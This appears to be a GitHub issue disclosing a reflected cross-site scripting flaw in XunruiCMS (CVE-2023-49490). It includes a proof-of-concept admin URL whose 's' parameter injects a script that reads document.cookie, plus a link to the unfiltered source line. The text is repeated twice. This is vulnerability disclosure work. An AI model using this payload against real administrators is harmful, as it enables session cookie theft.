Open Hebing123 opened 9 months ago
Proof of Concept (POC) http://192.168.160.132:5533/admin.php?c=notice&date_form=1906-10-28&date_to=1906-10-28&field=op_username&keyword=1&m=my_index&s=1%22%3E%3CScRiPt%20%3Ealert(document.cookie)%3C/ScRiPt%3E&submit=
If the administrator accesses the link, the Cookie will be stolen.
Details
https://github.com/dayrui/xunruicms/blob/b87e914e0df51f00443bd2a6824a09f504d0a4be/dayrui/Fcms/Core/Helper.php#L2039-L2053
Directly concatenating S-parameters without filtering results in reflective XSS vulnerabilities.
This is the vulnerability exploitation reference for CVE-2023-49490.
Proof of Concept (POC) http://192.168.160.132:5533/admin.php?c=notice&date_form=1906-10-28&date_to=1906-10-28&field=op_username&keyword=1&m=my_index&s=1%22%3E%3CScRiPt%20%3Ealert(document.cookie)%3C/ScRiPt%3E&submit=
If the administrator accesses the link, the Cookie will be stolen.
Details
https://github.com/dayrui/xunruicms/blob/b87e914e0df51f00443bd2a6824a09f504d0a4be/dayrui/Fcms/Core/Helper.php#L2039-L2053
Directly concatenating S-parameters without filtering results in reflective XSS vulnerabilities.